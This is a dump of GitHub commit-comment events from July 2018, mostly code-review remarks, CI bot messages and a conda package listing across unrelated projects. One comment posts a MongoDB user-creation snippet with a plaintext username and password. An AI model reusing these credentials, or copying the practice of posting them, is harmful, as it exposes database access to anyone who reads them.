{"id":"8017561945","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29831374,"position":null,"line":null,"path":null,"commit_id":"c4c2e08f0d71c8e8f0bdfcb988a42b33243fd2ca","created_at":"2018-07-25T16:16:19Z","updated_at":"2018-07-25T16:16:19Z","author_association":"NONE","body":"I made an error by forgetting to edit the bench number in the commit message. The bench number after this commit should be 4413383.\r\n\r\nI will push another \"fake\" commit with slight renaming of variables and stuff like that, to put the right bench number in the last commit of the day for the master branch..."}},"created_at":"2018-07-25T16:16:19Z"}
{"id":"8017563706","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831381,"position":41,"line":41,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:16:38Z","updated_at":"2018-07-25T16:16:38Z","author_association":"NONE","body":"You should use the count operator in your loop range: `0..#numBuckets`"}},"created_at":"2018-07-25T16:16:38Z"}
{"id":"8017564830","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831385,"position":29,"line":46,"path":"QieGaoWorld/views/login.py","commit_id":"19226f106ec465b9285fdd658a24fc7220fb486c","created_at":"2018-07-25T16:16:51Z","updated_at":"2018-07-25T16:16:51Z","author_association":"COLLABORATOR","body":"emm，我不知道文件得异常怎么写。。。emmm，就是偷懒直接写里面了"}},"created_at":"2018-07-25T16:16:51Z"}
{"id":"8017565915","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29831386,"position":96,"line":122,"path":"src/hdskins/java/com/voxelmodpack/hdskins/skins/NetClient.java","commit_id":"c72120efd1c006f628adef44c7479f8610b814ac","created_at":"2018-07-25T16:17:04Z","updated_at":"2018-07-25T16:17:04Z","author_association":"MEMBER","body":"Don't close quietly here. just call `response.close()`"}},"created_at":"2018-07-25T16:17:04Z"}
{"id":"8017569415","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29831394,"position":null,"line":null,"path":null,"commit_id":"77ff9c2fade10f218788f50b59b3ded757b78c72","created_at":"2018-07-25T16:17:41Z","updated_at":"2018-07-25T16:17:41Z","author_association":"CONTRIBUTOR","body":"rocailleu pourrait aller aussi"}},"created_at":"2018-07-25T16:17:41Z"}
{"id":"8017570407","type":"CommitCommentEvent","actor":{"login":"ivangalkin"},"repo":{"name":"ivangalkin/sonar-cxx"},"payload":{"comment":{"id":29831395,"position":28,"line":69,"path":"cxx-sensors/src/main/java/org/sonar/cxx/sensors/tests/xunit/CxxXunitSensor.java","commit_id":"83347fb26a715da47afd3460c15e478c105676fd","created_at":"2018-07-25T16:17:51Z","updated_at":"2018-07-25T16:17:51Z","author_association":"OWNER","body":"in the previous implementation `orElse()` was never executed, because the outed `if` condition ensured the presence of the option"}},"created_at":"2018-07-25T16:17:51Z"}
{"id":"8017570869","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29831397,"position":null,"line":null,"path":null,"commit_id":"6798d728becd58ab03f81d16e543e6cb19965d74","created_at":"2018-07-25T16:17:56Z","updated_at":"2018-07-25T16:17:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [IP commands for SWAT4](https://trello.com/c/JXoLhRXp/201-ip-commands-for-swat4)"}},"created_at":"2018-07-25T16:17:56Z"}
{"id":"8017570921","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29831398,"position":null,"line":null,"path":null,"commit_id":"ce12b41e996dbe62163141a33391110ad020924c","created_at":"2018-07-25T16:17:57Z","updated_at":"2018-07-25T16:17:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [IP commands for SWAT4](https://trello.com/c/JXoLhRXp/201-ip-commands-for-swat4)"}},"created_at":"2018-07-25T16:17:57Z"}
{"id":"8017571133","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831399,"position":12,"line":47,"path":"QieGaoWorld/views/login.py","commit_id":"e54fdffbd42ef3eaa84973b1f89867de9f22f3ff","created_at":"2018-07-25T16:17:59Z","updated_at":"2018-07-25T16:17:59Z","author_association":"OWNER","body":"账号不存在，确定是在except里进行return吗？"}},"created_at":"2018-07-25T16:17:59Z"}
{"id":"8017571149","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831400,"position":43,"line":43,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:17:59Z","updated_at":"2018-07-25T16:17:59Z","author_association":"NONE","body":"Also, as a style option you can replace curlies with `do` in one-liner for statements:\r\n```chapel\r\nfor m in 0..#numBuckets do\r\n  foo();\r\n```"}},"created_at":"2018-07-25T16:17:59Z"}
{"id":"8017571613","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29831402,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-25T16:18:05Z","updated_at":"2018-07-25T16:18:05Z","author_association":"COLLABORATOR","body":"This looks like a great first step.\r\n\r\nOne way of doing is in a more user-friendly way would be to accept a `n x t` dimensional `train_y` input, infer the number of tasks from the dimension of the training input, and then use the column index as the task index. "}},"created_at":"2018-07-25T16:18:05Z"}
{"id":"8017571621","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29831403,"position":null,"line":null,"path":null,"commit_id":"15cddc395bc0abf5e1c3b54a7719ae299c822e07","created_at":"2018-07-25T16:18:05Z","updated_at":"2018-07-25T16:18:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [IP commands for SWAT4](https://trello.com/c/JXoLhRXp/201-ip-commands-for-swat4)"}},"created_at":"2018-07-25T16:18:05Z"}
{"id":"8017572487","type":"CommitCommentEvent","actor":{"login":"mpetrovic"},"repo":{"name":"openscholar/openscholar"},"payload":{"comment":{"id":29831405,"position":5,"line":5,"path":"openscholar/modules/os/os.info","commit_id":"bd5f0d7e3a22fc66234c8f7959abcde54ba2758b","created_at":"2018-07-25T16:18:15Z","updated_at":"2018-07-25T16:18:15Z","author_association":"MEMBER","body":"Take out all of the dependencies you added here other than recaptcha. This might be the issue with the tests. I've had problems with the tests breaking when the install order has changed, and this would do that."}},"created_at":"2018-07-25T16:18:15Z"}
{"id":"8017572504","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29831406,"position":null,"line":null,"path":null,"commit_id":"c002703e24e2f5c2f8a90bbb1d12afa2c77aae50","created_at":"2018-07-25T16:18:15Z","updated_at":"2018-07-25T16:18:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [IP commands for SWAT4](https://trello.com/c/JXoLhRXp/201-ip-commands-for-swat4)"}},"created_at":"2018-07-25T16:18:15Z"}
{"id":"8017572606","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29831407,"position":null,"line":null,"path":null,"commit_id":"ce12b41e996dbe62163141a33391110ad020924c","created_at":"2018-07-25T16:18:16Z","updated_at":"2018-07-25T16:18:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [IP commands for SWAT4](https://trello.com/c/JXoLhRXp/201-ip-commands-for-swat4)"}},"created_at":"2018-07-25T16:18:16Z"}
{"id":"8017572706","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29831408,"position":null,"line":null,"path":null,"commit_id":"c41d2d51a14b0a4d5f18e21aa3f9aede660c8135","created_at":"2018-07-25T16:18:17Z","updated_at":"2018-07-25T16:18:17Z","author_association":"NONE","body":"Last line seems wrong because the border in the king side is to the left. Use have shorted the king flanl for a king on the f file."}},"created_at":"2018-07-25T16:18:17Z"}
{"id":"8017572918","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831410,"position":14,"line":49,"path":"QieGaoWorld/views/login.py","commit_id":"e54fdffbd42ef3eaa84973b1f89867de9f22f3ff","created_at":"2018-07-25T16:18:19Z","updated_at":"2018-07-25T16:18:19Z","author_association":"OWNER","body":"这里其实不用写finally呀"}},"created_at":"2018-07-25T16:18:19Z"}
{"id":"8017576958","type":"CommitCommentEvent","actor":{"login":"vermontgarcia"},"repo":{"name":"vermontgarcia/roverMars"},"payload":{"comment":{"id":29831412,"position":null,"line":null,"path":null,"commit_id":"3d964b7c982ea93d7c1fd2ded58ba66608434971","created_at":"2018-07-25T16:19:02Z","updated_at":"2018-07-25T16:19:02Z","author_association":"OWNER","body":"Gracias por tus comentarios.\n\nHice las modificaciones en los Switch Cases con la indentacion\ncorrespondiente. Dos commits ya que en el segundo no lo había hecho en las\nfunciones de moveForward y moveBackward lo que realice en el tercero.\n\nMe queda la duda sobre tu comentario de la refactorizacion. Me ayudas a\nentender?\n\nSaludos y gracias nuevamente.\n\nVermont\n\n\nOn Tue, Jul 24, 2018 at 9:35 PM, Bet M <notifications@github.com> wrote:\n\n> Bien logrado, hace falta refactorizar pero ya lo aprenderás durante el\n> bootcamp. me gustó que imprimieras la grid!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vermontgarcia/roverMars/commit/3d964b7c982ea93d7c1fd2ded58ba66608434971#commitcomment-29823199>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AmmjZe_0XEN53DCDcxoY3cqL9txN5nyUks5uJ9l5gaJpZM4VfVc5>\n> .\n>\n"}},"created_at":"2018-07-25T16:19:02Z"}
{"id":"8017579939","type":"CommitCommentEvent","actor":{"login":"jamesvclements"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":29831417,"position":null,"line":null,"path":null,"commit_id":"d114e6894094cc737ee73dcc7dc4092edbe2e41f","created_at":"2018-07-25T16:19:35Z","updated_at":"2018-07-25T16:19:35Z","author_association":"NONE","body":"When can we expect a release of `react-adapter-16` to use `enzyme-adapter-utils@1.4.0`? Looks like it's still on [1.3.0](https://github.com/airbnb/enzyme/blob/master/packages/enzyme-adapter-react-16/package.json#L37)"}},"created_at":"2018-07-25T16:19:35Z"}
{"id":"8017580507","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29831418,"position":null,"line":null,"path":null,"commit_id":"968b9174dfac8097b0c6642d2a344068067f7d1d","created_at":"2018-07-25T16:19:41Z","updated_at":"2018-07-25T16:19:41Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-44](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-44-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T16:19:41Z"}
{"id":"8017580869","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831419,"position":12,"line":47,"path":"QieGaoWorld/views/login.py","commit_id":"e54fdffbd42ef3eaa84973b1f89867de9f22f3ff","created_at":"2018-07-25T16:19:45Z","updated_at":"2018-07-25T16:19:45Z","author_association":"COLLABORATOR","body":"是的，当没有这个文件的时候就说明没有这个玩家"}},"created_at":"2018-07-25T16:19:45Z"}
{"id":"8017581327","type":"CommitCommentEvent","actor":{"login":"rartner"},"repo":{"name":"mathvalenza/bootcamp-final-project"},"payload":{"comment":{"id":29831421,"position":1,"line":1,"path":".gitignore","commit_id":"9461cd253b2aa190a00e546edf945cdbe212b47e","created_at":"2018-07-25T16:19:50Z","updated_at":"2018-07-25T16:19:50Z","author_association":"NONE","body":"de nada"}},"created_at":"2018-07-25T16:19:50Z"}
{"id":"8017581428","type":"CommitCommentEvent","actor":{"login":"eLBati"},"repo":{"name":"OCA/l10n-italy"},"payload":{"comment":{"id":29831422,"position":16,"line":16,"path":"l10n_it_esigibilita_iva/README.rst","commit_id":"9f57d6a87f1c44ad560c69012af32b2c192d0dd6","created_at":"2018-07-25T16:19:51Z","updated_at":"2018-07-25T16:19:51Z","author_association":"MEMBER","body":"@jado95 ci siamo dimenticati di modificare in ```11.0```. Puoi correggere con un'altra PR?"}},"created_at":"2018-07-25T16:19:51Z"}
{"id":"8017582418","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29831424,"position":null,"line":null,"path":null,"commit_id":"091fab03cefff8c876a3a665cf123098d4d9b339","created_at":"2018-07-25T16:20:02Z","updated_at":"2018-07-25T16:20:02Z","author_association":"MEMBER","body":"😕 "}},"created_at":"2018-07-25T16:20:02Z"}
{"id":"8017583721","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29831427,"position":14,"line":49,"path":"QieGaoWorld/views/login.py","commit_id":"e54fdffbd42ef3eaa84973b1f89867de9f22f3ff","created_at":"2018-07-25T16:20:16Z","updated_at":"2018-07-25T16:20:16Z","author_association":"COLLABORATOR","body":"这是你原来的，，我就把读文件写到try里了其他的没动"}},"created_at":"2018-07-25T16:20:16Z"}
{"id":"8017584470","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29831429,"position":null,"line":null,"path":null,"commit_id":"c41d2d51a14b0a4d5f18e21aa3f9aede660c8135","created_at":"2018-07-25T16:20:24Z","updated_at":"2018-07-25T16:20:24Z","author_association":"OWNER","body":"Good catch! Thanks."}},"created_at":"2018-07-25T16:20:24Z"}
{"id":"8017587695","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29831438,"position":47,"line":47,"path":"discover/portal/articles/120-search/06-search-configuration.markdown","commit_id":"4bdb0a8a1fce053c91180d2992906806bd6f655b","created_at":"2018-07-25T16:20:58Z","updated_at":"2018-07-25T16:20:58Z","author_association":"OWNER","body":"Need info"}},"created_at":"2018-07-25T16:20:58Z"}
{"id":"8017589033","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29831439,"position":67,"line":67,"path":"discover/portal/articles/120-search/06-search-configuration.markdown","commit_id":"4bdb0a8a1fce053c91180d2992906806bd6f655b","created_at":"2018-07-25T16:21:12Z","updated_at":"2018-07-25T16:21:12Z","author_association":"OWNER","body":"Need answers"}},"created_at":"2018-07-25T16:21:12Z"}
{"id":"8017589941","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29831441,"position":76,"line":76,"path":"discover/portal/articles/120-search/06-search-configuration.markdown","commit_id":"4bdb0a8a1fce053c91180d2992906806bd6f655b","created_at":"2018-07-25T16:21:22Z","updated_at":"2018-07-25T16:21:22Z","author_association":"OWNER","body":"Need info"}},"created_at":"2018-07-25T16:21:22Z"}
{"id":"8017590753","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29831445,"position":86,"line":86,"path":"discover/portal/articles/120-search/06-search-configuration.markdown","commit_id":"4bdb0a8a1fce053c91180d2992906806bd6f655b","created_at":"2018-07-25T16:21:31Z","updated_at":"2018-07-25T16:21:31Z","author_association":"OWNER","body":"Need info"}},"created_at":"2018-07-25T16:21:31Z"}
{"id":"8017595055","type":"CommitCommentEvent","actor":{"login":"johnsteinbeck"},"repo":{"name":"kosua20/MIDIVisualizer"},"payload":{"comment":{"id":29831450,"position":null,"line":null,"path":null,"commit_id":"3e2c7bd33f91724625023fbf316f8f0080c5a4b7","created_at":"2018-07-25T16:22:20Z","updated_at":"2018-07-25T16:22:20Z","author_association":"NONE","body":"Thanks for updating the readme part. I easily reached the program. I had time to test the program for the last days. I'm really amazed with the work you've done. I've been using Synthesia and Piano From Above for a quite long time and Ialways wanted see better visuals when the piano notes hit. What you are doing can be a game changer.  I'm sure you are still working on it. As I test it I saw that it works really good with the big midi files. If you ever think of an update please add other visualition options such as different particals etc. Or you can put an option wehere we can put our own particals and effects. I have no idea if this is possible or not but I'm looking forward to see more update on this program. Thanks :)"}},"created_at":"2018-07-25T16:22:20Z"}
{"id":"8017597043","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29831461,"position":null,"line":null,"path":null,"commit_id":"ed36366dea4b2d0410849daa94c413132b672612","created_at":"2018-07-25T16:22:40Z","updated_at":"2018-07-25T16:22:40Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-378](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-378).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-378-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T16:22:40Z"}
{"id":"8017599578","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29831468,"position":null,"line":null,"path":null,"commit_id":"ed36366dea4b2d0410849daa94c413132b672612","created_at":"2018-07-25T16:23:10Z","updated_at":"2018-07-25T16:23:10Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-379](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-379).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-379-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T16:23:10Z"}
{"id":"8017601426","type":"CommitCommentEvent","actor":{"login":"jeanconn"},"repo":{"name":"sot/skare3"},"payload":{"comment":{"id":29831473,"position":156,"line":162,"path":"ska_conda/pkg_defs/ska3-core/meta.yaml","commit_id":"0fb03f328b3776bf8bce1e245c9cad20648318ab","created_at":"2018-07-25T16:23:31Z","updated_at":"2018-07-25T16:23:31Z","author_association":"CONTRIBUTOR","body":"If I update to conda 4.3.30 it looks like we get a different dependency tree from the slightly more modern packages.  And I'm just recording this here for the trivia.  The take-away is that different versions of conda appear to be looking in different default channels whether specified in a `.condarc` or not (I'm not setting default_channels in my .condarc on osx).  So this is worth keeping in mind in general. \r\n\r\nI think for the compromise for now, we probably want to stick with conda 4.3.21 on both linux and mac, add zeromq to ska3-dev for luck, update ska3-core with it, and then run ska_testr in the built environment on both platforms (which is what I've been doing, but hadn't explicitly added back zeromq).\r\n\r\n\r\n\r\n```\r\nsaos-MacBook-Pro-3:skare3 jean$ conda create -n zmq python=3.6.2 jupyter\r\nFetching package metadata ...............\r\nSolving package specifications: .\r\n\r\nPackage plan for installation in environment /proj/tconda/envs/zmq:\r\n\r\nThe following NEW packages will be INSTALLED:\r\n\r\n    appdirs:            1.4.3-py36h28b3542_0\r\n    appnope:            0.1.0-py36hf537a9a_0\r\n    asn1crypto:         0.24.0-py36_0\r\n    attrs:              18.1.0-py36_0\r\n    automat:            0.7.0-py36_0\r\n    backcall:           0.1.0-py36_0\r\n    bleach:             2.1.3-py36_0\r\n    ca-certificates:    2018.03.07-0\r\n    certifi:            2018.4.16-py36_0\r\n    cffi:               1.11.5-py36h342bebf_0\r\n    constantly:         15.1.0-py36h28b3542_0\r\n    cryptography:       2.2.2-py36h1de35cc_0\r\n    dbus:               1.13.2-h760590f_1\r\n    decorator:          4.3.0-py36_0\r\n    entrypoints:        0.2.3-py36_2\r\n    expat:              2.2.5-hb8e80ba_0\r\n    gettext:            0.19.8.1-h15daf44_3\r\n    glib:               2.56.1-h35bc53a_0\r\n    html5lib:           1.0.1-py36_0\r\n    hyperlink:          18.0.0-py36_0\r\n    icu:                58.2-h4b95b61_1\r\n    idna:               2.7-py36_0\r\n    incremental:        17.5.0-py36_0\r\n    ipykernel:          4.8.2-py36_0\r\n    ipython:            6.4.0-py36_1\r\n    ipython_genutils:   0.2.0-py36h241746c_0\r\n    ipywidgets:         7.3.0-py36_0\r\n    jedi:               0.12.1-py36_0\r\n    jinja2:             2.10-py36_0\r\n    jpeg:               9b-he5867d9_2\r\n    jsonschema:         2.6.0-py36hb385e00_0\r\n    jupyter:            1.0.0-py36_4\r\n    jupyter_client:     5.2.3-py36_0\r\n    jupyter_console:    5.2.0-py36_1\r\n    jupyter_core:       4.4.0-py36_0\r\n    libcxx:             4.0.1-h579ed51_0\r\n    libcxxabi:          4.0.1-hebd6815_0\r\n    libedit:            3.1.20170329-hb402a30_2\r\n    libffi:             3.2.1-h475c297_4\r\n    libiconv:           1.15-hdd342a3_7\r\n    libpng:             1.6.34-he12f830_0\r\n    libsodium:          1.0.16-h3efe00b_0\r\n    markupsafe:         1.0-py36h1de35cc_1\r\n    mistune:            0.8.3-py36h1de35cc_1\r\n    nbconvert:          5.3.1-py36_0\r\n    nbformat:           4.4.0-py36h827af21_0\r\n    ncurses:            6.1-h0a44026_0\r\n    notebook:           5.6.0-py36_0\r\n    openssl:            1.0.2o-h26aff7b_0\r\n    pandoc:             2.2.1-h1a437c5_0\r\n    pandocfilters:      1.4.2-py36_1\r\n    parso:              0.3.1-py36_0\r\n    pcre:               8.42-h378b8a2_0\r\n    pexpect:            4.6.0-py36_0\r\n    pickleshare:        0.7.4-py36hf512f8e_0\r\n    pip:                10.0.1-py36_0\r\n    prometheus_client:  0.2.0-py36_0\r\n    prompt_toolkit:     1.0.15-py36haeda067_0\r\n    ptyprocess:         0.6.0-py36_0\r\n    pyasn1:             0.4.3-py36_0\r\n    pyasn1-modules:     0.2.2-py36_0\r\n    pycparser:          2.18-py36_1\r\n    pygments:           2.2.0-py36h240cd3f_0\r\n    pyopenssl:          18.0.0-py36_0\r\n    pyqt:               5.9.2-py36h655552a_0\r\n    python:             3.6.2-hd04bb42_19\r\n    python-dateutil:    2.7.3-py36_0\r\n    pyzmq:              17.0.0-py36h1de35cc_3\r\n    qt:                 5.9.6-h74ce4d9_0\r\n    qtconsole:          4.3.1-py36hd96c0ff_0\r\n    readline:           7.0-hc1231fa_4\r\n    send2trash:         1.5.0-py36_0\r\n    service_identity:   17.0.0-py36h28b3542_0\r\n    setuptools:         39.2.0-py36_0\r\n    simplegeneric:      0.8.1-py36_2\r\n    sip:                4.19.8-py36h0a44026_0\r\n    six:                1.11.0-py36_1\r\n    sqlite:             3.24.0-ha441bb4_0\r\n    terminado:          0.8.1-py36_1\r\n    testpath:           0.3.1-py36h625a49b_0\r\n    tk:                 8.6.7-h35a86e2_3\r\n    tornado:            5.0.2-py36h1de35cc_0\r\n    traitlets:          4.3.2-py36h65bd3ce_0\r\n    twisted:            18.4.0-py36h1de35cc_0\r\n    wcwidth:            0.1.7-py36h8c6ec74_0\r\n    webencodings:       0.5.1-py36_1\r\n    wheel:              0.31.1-py36_0\r\n    widgetsnbextension: 3.3.0-py36_0\r\n    xz:                 5.2.4-h1de35cc_4\r\n    zeromq:             4.2.5-h0a44026_0\r\n    zlib:               1.2.11-hf3cbc9b_2\r\n    zope:               1.0-py36_0\r\n    zope.interface:     4.5.0-py36h1de35cc_0\r\n```"}},"created_at":"2018-07-25T16:23:31Z"}
{"id":"8017604929","type":"CommitCommentEvent","actor":{"login":"p10shinde"},"repo":{"name":"p10shinde/random"},"payload":{"comment":{"id":29831481,"position":null,"line":null,"path":null,"commit_id":"f73bdfaec30494b06bdf06656b4a36a2758531f8","created_at":"2018-07-25T16:24:11Z","updated_at":"2018-07-25T16:24:11Z","author_association":"OWNER","body":"use <projectName>\r\nvar user = {user:\"apiAdmin\",pwd:\"apiadm!n$(full)\",roles:[{role:\"readWrite\",db: \"<projectName>\"}]}\r\ndb.createUser(user);\r\n"}},"created_at":"2018-07-25T16:24:11Z"}
{"id":"8017605765","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831484,"position":72,"line":72,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:24:20Z","updated_at":"2018-07-25T16:24:20Z","author_association":"NONE","body":"Besides my nitpicking above, I think there is an important step that you need to take on the way to having a user-facing radix sort function.\r\n\r\nMore often then not, recursive functions require auxiliary arguments as you appropriately define them here. But user shouldn't be responsible for creating them and passing to the function. So, when it is time for you to package this as a library function your current `radix_sort_msd` function should not be a user facing function. Instead there should be a wrapper function around these that initializes those auxiliary stuff and calls the actual recursive function.\r\n\r\nBasically your `main` function (minus input initialization) will be the actual user-facing library function. "}},"created_at":"2018-07-25T16:24:20Z"}
{"id":"8017607815","type":"CommitCommentEvent","actor":{"login":"mattam82"},"repo":{"name":"SkySkimmer/coq"},"payload":{"comment":{"id":29831489,"position":null,"line":null,"path":null,"commit_id":"cef2893c4ef21193c956de915a3934c67ff0575b","created_at":"2018-07-25T16:24:43Z","updated_at":"2018-07-25T16:24:43Z","author_association":"NONE","body":"@SkySkimmer this looks fine to me"}},"created_at":"2018-07-25T16:24:43Z"}
{"id":"8017634966","type":"CommitCommentEvent","actor":{"login":"e-kayrakli"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29831586,"position":14,"line":14,"path":"radixsort_msb_v3.chpl","commit_id":"79cff6054a0fbb0d46bd1cbd02dbe8621c43a29b","created_at":"2018-07-25T16:29:39Z","updated_at":"2018-07-25T16:29:39Z","author_association":"NONE","body":"This is fine for now. But ideally you should stop recursing and radix sort at one point and use some simple O(n^2) comparison sort. Sweet spot for where to stop is hard to guess and dependent on many things, but in the past I have seen values less than 100 for stopping recursing in quicksort. In the current Sort module, I see that mergesort uses 16 as default the default size before switching to insertion sort:\r\nhttps://github.com/chapel-lang/chapel/blob/master/modules/packages/Sort.chpl#L600"}},"created_at":"2018-07-25T16:29:39Z"}
{"id":"8017635187","type":"CommitCommentEvent","actor":{"login":"nikolay-advolodkin"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29831590,"position":null,"line":null,"path":null,"commit_id":"942b8a437bd1f646878331112828ada28588ec32","created_at":"2018-07-25T16:29:41Z","updated_at":"2018-07-25T16:29:41Z","author_association":"NONE","body":"Hi @jimevans. What do you recommend as a work around now to deal with a proxy when using WebDriver with .NET Core? Since this solution seems to automatically set the Proxy property to null."}},"created_at":"2018-07-25T16:29:41Z"}
{"id":"8017635402","type":"CommitCommentEvent","actor":{"login":"ZeroChaos-"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29831591,"position":null,"line":null,"path":null,"commit_id":"3851b896e4862b204a9969012cb584a77568c892","created_at":"2018-07-25T16:29:43Z","updated_at":"2018-07-25T16:29:43Z","author_association":"CONTRIBUTOR","body":"it's pointless to set keywords to ~ on the meta package when we unmask all\nthe rest anyway.  all you did was break my livecd build\n\nOn Wed, Jul 25, 2018 at 12:00 PM, Anton Bolshakov <notifications@github.com>\nwrote:\n\n> Run repoman and put keywords back to ~\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pentoo/pentoo-overlay/commit/3851b896e4862b204a9969012cb584a77568c892#commitcomment-29831172>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABl--YdiwhYijtCuoIbnrY_0UB7s6rJyks5uKJYYgaJpZM4VgW-R>\n> .\n>\n"}},"created_at":"2018-07-25T16:29:43Z"}
{"id":"8017639761","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29831600,"position":null,"line":null,"path":null,"commit_id":"92b0982f36606122f6750c557cfe9a4e033dffee","created_at":"2018-07-25T16:30:32Z","updated_at":"2018-07-25T16:30:32Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-25T16:30:32Z"}
{"id":"8017640160","type":"CommitCommentEvent","actor":{"login":"ZeroChaos-"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29831601,"position":null,"line":null,"path":null,"commit_id":"98983922ae6ddeb809ac53afe37bc23872e614a3","created_at":"2018-07-25T16:30:37Z","updated_at":"2018-07-25T16:30:37Z","author_association":"CONTRIBUTOR","body":"meh, I'm sorry I committed too much for you :-P"}},"created_at":"2018-07-25T16:30:37Z"}
